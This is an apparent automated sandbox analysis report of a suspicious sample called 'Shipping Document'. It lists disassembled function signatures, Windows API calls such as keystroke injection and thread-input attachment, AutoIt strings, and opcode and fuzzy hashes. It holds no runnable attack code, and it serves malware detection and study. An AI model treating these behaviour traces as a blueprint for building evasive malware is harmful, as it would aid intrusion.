                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Library$Free$Load__wfsopen_memmove
                              • String ID:
                              • API String ID: 1396898556-0
                              • Opcode ID: e2eea9debacd2badac9fc8bb716ceb97386ddce2c13ad754ab799d49c004e554
                              • Instruction ID: 40d317d4d11bebca702011a73ed2594e9e5b6b67d5c8955858d70c54a3169704
                              • Opcode Fuzzy Hash: e2eea9debacd2badac9fc8bb716ceb97386ddce2c13ad754ab799d49c004e554
                              • Instruction Fuzzy Hash: EA11E73260020BABCB14FF74CE67FAE77A59F40711F10842DF941A71C1DA79AA05BBA0
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 54b07f0ca23aad82287800917a89c8a760135c7950642fc101eb8d18e1b45621
                              • Instruction ID: 6839bc1544fa5c5f571c7a574a3a78f3906c3eaa3694fdcd9b6dcec8c5f32ede
                              • Opcode Fuzzy Hash: 54b07f0ca23aad82287800917a89c8a760135c7950642fc101eb8d18e1b45621
                              • Instruction Fuzzy Hash: 0B211FB4908342DFDB25DF65C985F1ABBE0BB84318F04886CE98A47761C735F845DB92
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FE09F4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: LongNamePath
                              • String ID:
                              • API String ID: 82841172-0
                              • Opcode ID: acfb2f6243b039b5672768ffc86251c791cf0114a286c1c20b526726435d8d17
                              • Instruction ID: 11bc0a64a54025b714b72df16cf6a38998a267ac1b6246481cb3cf30f0a63168
                              • Opcode Fuzzy Hash: acfb2f6243b039b5672768ffc86251c791cf0114a286c1c20b526726435d8d17
                              • Instruction Fuzzy Hash: 1201807384A2818FC352C774D95A6D03BB6DE5762932801DDDC429A532E5675C13AB50
                              APIs
                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00FC5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FC5D76
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: d4a9a9d0ba70d058b370f06285ec8d894eb2f73a0098b7dccdf08dd7fc858e24
                              • Instruction ID: b0c01ff4529aa5a52576b4b4d75a03c56a90b2043c77137b5df0bad612d6ff53
                              • Opcode Fuzzy Hash: d4a9a9d0ba70d058b370f06285ec8d894eb2f73a0098b7dccdf08dd7fc858e24
                              • Instruction Fuzzy Hash: D6115871608B029FD3308F05CA85F62B7E4EB45B20F10892EE8AB86A50D771F984DB60
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                              • Instruction ID: 2df2721eb4f9156ce88eddb36ceb1311a44ff3f7bad3867578d0e984e8c5deee
                              • Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                              • Instruction Fuzzy Hash: 1B01A779600542AFC305DB29C942E26FBA9FF853143148159F815C7702DB75FC61DBE0
                              APIs
                              • __lock_file.LIBCMT ref: 00FE4AD6
                                • Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2597487223-0
                              • Opcode ID: 4166419d4f7c8d24f6847da06c398fa2ca6d6aa1c68465d1d7776b04350b418c
                              • Instruction ID: 5695d4dfa45f5eeb2f1b3a7ee6eec8b59ea2b1f304bd36bc9a68783e2bb79a04
                              • Opcode Fuzzy Hash: 4166419d4f7c8d24f6847da06c398fa2ca6d6aa1c68465d1d7776b04350b418c
                              • Instruction Fuzzy Hash: 0CF0AF31D40289ABDF61BF668C063AF36A1AF00775F048528F828AA1D1DB7C9A51FF55
                              APIs
                              • FreeLibrary.KERNEL32(?,?,010862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FC4FDE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: aa627b5eaed96fa83defd2fb009054a3c2deb9ed78f0251f2c0b276501191d28
                              • Instruction ID: c6d90210e7c903356aaf45fa3c339eeda5847e7d4a7ccd7260384860e7cff250
                              • Opcode Fuzzy Hash: aa627b5eaed96fa83defd2fb009054a3c2deb9ed78f0251f2c0b276501191d28
                              • Instruction Fuzzy Hash: ACF015B2505712CFCB389F64E5A5E12BBE1AF043293248A2EE5D683A10C772A840EF40
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FE09F4
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: LongNamePath_memmove
                              • String ID:
                              • API String ID: 2514874351-0
                              • Opcode ID: b41c44c60b8027eb031677c67fe116006482fe76821e25d5383b1878c17e2755
                              • Instruction ID: b8ae64170d493905cb9766380aa7bb2c89b999c6ed3dad512c24c1df1ec25213
                              • Opcode Fuzzy Hash: b41c44c60b8027eb031677c67fe116006482fe76821e25d5383b1878c17e2755
                              • Instruction Fuzzy Hash: F5E086769052299BC720E5589C06FFA77ADDF88790F0401B5FD4CD7208D9659C818690
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __fread_nolock
                              • String ID:
                              • API String ID: 2638373210-0
                              • Opcode ID: 85a266c19ac15f6dd4f37f244161312340f338b31e1d7e5613d3c154e10e17cf
                              • Instruction ID: 52c2e9313693a37e291c8b4e9899284925bd6d27f3b1f403c9eaeeee53cc3c9e
                              • Opcode Fuzzy Hash: 85a266c19ac15f6dd4f37f244161312340f338b31e1d7e5613d3c154e10e17cf
                              • Instruction Fuzzy Hash: BEE092B0104B505FDB798A28D8107E377E0AB06319F00085DF2DA83342EB627841C759
                              APIs
                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00FFE16B,?,?,00000000), ref: 00FC5DBF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: feebc1120ae8911a2392ab6ab9a9b4e264f8ae4216e3b71a4c05ee68a4de55fe
                              • Instruction ID: a589d4ba8fbfbd6a2bbaf5377417d3eb3fda3c3b75315c4c401cd6dc18917300
                              • Opcode Fuzzy Hash: feebc1120ae8911a2392ab6ab9a9b4e264f8ae4216e3b71a4c05ee68a4de55fe
                              • Instruction Fuzzy Hash: 70D0C77464020CBFE710DB84DC46FA9777CD705710F100194FD0456290D6B27D508795
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __wfsopen
                              • String ID:
                              • API String ID: 197181222-0
                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                              • Instruction ID: 45f44c800f194e76492d40cf083b43dc43a9e5955b87bca747f1a7c98342ac2b
                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                              • Instruction Fuzzy Hash: 33B0927684020C77DE022E82EC02A593B199B40A78F808020FB0C181A2A677A6A0A689
                              APIs
                              • GetTempPathW.KERNELBASE(00000104,?), ref: 0100221A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: PathTemp
                              • String ID:
                              • API String ID: 2920410445-0
                              • Opcode ID: b92ecb0de9d8a844e977b1f0cae787e5afc9a3e32b79e30edc8e7f9f535dafa2
                              • Instruction ID: 00a6d6629590d338d26a35537d9539abc8d760d1d9793c0dcc7dcfed69efbc2b
                              • Opcode Fuzzy Hash: b92ecb0de9d8a844e977b1f0cae787e5afc9a3e32b79e30edc8e7f9f535dafa2
                              • Instruction Fuzzy Hash: ECC09B7445401A9FF725A754CDD5ABC733CFF00701F0000D5718591080DAF45B80CF11
                              APIs
                              • GetLastError.KERNEL32(00000002,00000000), ref: 0102D46A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 61c4a79935600d8694c0dde5d8c7634a4d5611015122a09d1e1ee04f4ba43c1b
                              • Instruction ID: ac1f78c35e8e417bf09744457658355e107d7f20729dbc24c88ff760e764a79f
                              • Opcode Fuzzy Hash: 61c4a79935600d8694c0dde5d8c7634a4d5611015122a09d1e1ee04f4ba43c1b
                              • Instruction Fuzzy Hash: 2E7161302083128FC714EF68C991FAAB7E0AF88714F04456DF5968B291DF78ED49DB52
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction ID: 6889ebc193a5197ae199a0f35fdea1615ee37309587f54b6db755d99459beeb6
                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction Fuzzy Hash: 81312971A00186DFC718DF4AC480A69F7B2FF59310B688AA5E409CB251DB70EDC0EBD0
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 01E52311
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction ID: e16ceb46a303e46deb43ae10c988d141e9cc21d30ac3354acbcf8ff53eb068e7
                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction Fuzzy Hash: F6E0E67594010EDFDB00EFB4D54969E7FB4EF04301F500561FD01D2281D6309D508A62
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0104CE50
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0104CE91
                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0104CED6
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0104CF00
                              • SendMessageW.USER32 ref: 0104CF29
                              • _wcsncpy.LIBCMT ref: 0104CFA1
                              • GetKeyState.USER32(00000011), ref: 0104CFC2
                              • GetKeyState.USER32(00000009), ref: 0104CFCF
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0104CFE5
                              • GetKeyState.USER32(00000010), ref: 0104CFEF
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0104D018
                              • SendMessageW.USER32 ref: 0104D03F
                              • SendMessageW.USER32(?,00001030,?,0104B602), ref: 0104D145
                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0104D15B
                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0104D16E
                              • SetCapture.USER32(?), ref: 0104D177
                              • ClientToScreen.USER32(?,?), ref: 0104D1DC
                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0104D1E9
                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0104D203
                              • ReleaseCapture.USER32 ref: 0104D20E
                              • GetCursorPos.USER32(?), ref: 0104D248
                              • ScreenToClient.USER32(?,?), ref: 0104D255
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0104D2B1
                              • SendMessageW.USER32 ref: 0104D2DF
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0104D31C
                              • SendMessageW.USER32 ref: 0104D34B
                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0104D36C
                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0104D37B
                              • GetCursorPos.USER32(?), ref: 0104D39B
                              • ScreenToClient.USER32(?,?), ref: 0104D3A8
                              • GetParent.USER32(?), ref: 0104D3C8
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0104D431
                              • SendMessageW.USER32 ref: 0104D462
                              • ClientToScreen.USER32(?,?), ref: 0104D4C0
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0104D4F0
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0104D51A
                              • SendMessageW.USER32 ref: 0104D53D
                              • ClientToScreen.USER32(?,?), ref: 0104D58F
                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0104D5C3
                                • Part of subcall function 00FC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FC25EC
                              • GetWindowLongW.USER32(?,000000F0), ref: 0104D65F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                              • String ID: @GUI_DRAGID$F
                              • API String ID: 3977979337-4164748364
                              • Opcode ID: ac525ef531fe3aa90499ba84c21edd31074934b4a9b4a202b9f2072b7072d049
                              • Instruction ID: cf7a391e6659eaa18b4db3871dbb4860fb414c74fcaf84db2daa78508a55fc03
                              • Opcode Fuzzy Hash: ac525ef531fe3aa90499ba84c21edd31074934b4a9b4a202b9f2072b7072d049
                              • Instruction Fuzzy Hash: 2D42BEB4205241AFE725DF68C984FAABFE5FF48354F04056DF6D5872A1C736A840CB92
                              APIs
                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0104873F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: %d/%02d/%02d
                              • API String ID: 3850602802-328681919
                              • Opcode ID: f3cbc122cf2fb10ec9a2f3b830b7740fd37f4af5dc50b1972ac47e0bc55ed21d
                              • Instruction ID: d76cf44dc4275493cfdcfb024a090ded35eb1490b16b901f724a6f9dfbf180d4
                              • Opcode Fuzzy Hash: f3cbc122cf2fb10ec9a2f3b830b7740fd37f4af5dc50b1972ac47e0bc55ed21d
                              • Instruction Fuzzy Hash: 8E1213B0500245ABEB259FA8CD89FAE7BF8FF49750F00856AFA95EA191DB748540CB10
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove$_memset
                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                              • API String ID: 1357608183-1798697756
                              • Opcode ID: af6937b09511c39889588a2e3751a1cd7b8400b7facfab1d037aabcae3de7fe5
                              • Instruction ID: 94fe261d8f19de269f3eca581cbdbd4c11bd9119e01c993aa6ff0a4a9b65a679
                              • Opcode Fuzzy Hash: af6937b09511c39889588a2e3751a1cd7b8400b7facfab1d037aabcae3de7fe5
                              • Instruction Fuzzy Hash: A8939171E00215DBDB24DF98C8817ADB7F1FF48320F2885AAE985EB395E7749981DB40
                              APIs
                              • GetForegroundWindow.USER32(00000000,?), ref: 00FC4A3D
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FFDA8E
                              • IsIconic.USER32(?), ref: 00FFDA97
                              • ShowWindow.USER32(?,00000009), ref: 00FFDAA4
                              • SetForegroundWindow.USER32(?), ref: 00FFDAAE
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FFDAC4
                              • GetCurrentThreadId.KERNEL32 ref: 00FFDACB
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FFDAD7
                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FFDAE8
                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FFDAF0
                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FFDAF8
                              • SetForegroundWindow.USER32(?), ref: 00FFDAFB
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFDB10
                              • keybd_event.USER32(00000012,00000000), ref: 00FFDB1B
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFDB25
                              • keybd_event.USER32(00000012,00000000), ref: 00FFDB2A
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFDB33
                              • keybd_event.USER32(00000012,00000000), ref: 00FFDB38
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFDB42
                              • keybd_event.USER32(00000012,00000000), ref: 00FFDB47
                              • SetForegroundWindow.USER32(?), ref: 00FFDB4A
                              • AttachThreadInput.USER32(?,?,00000000), ref: 00FFDB71
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
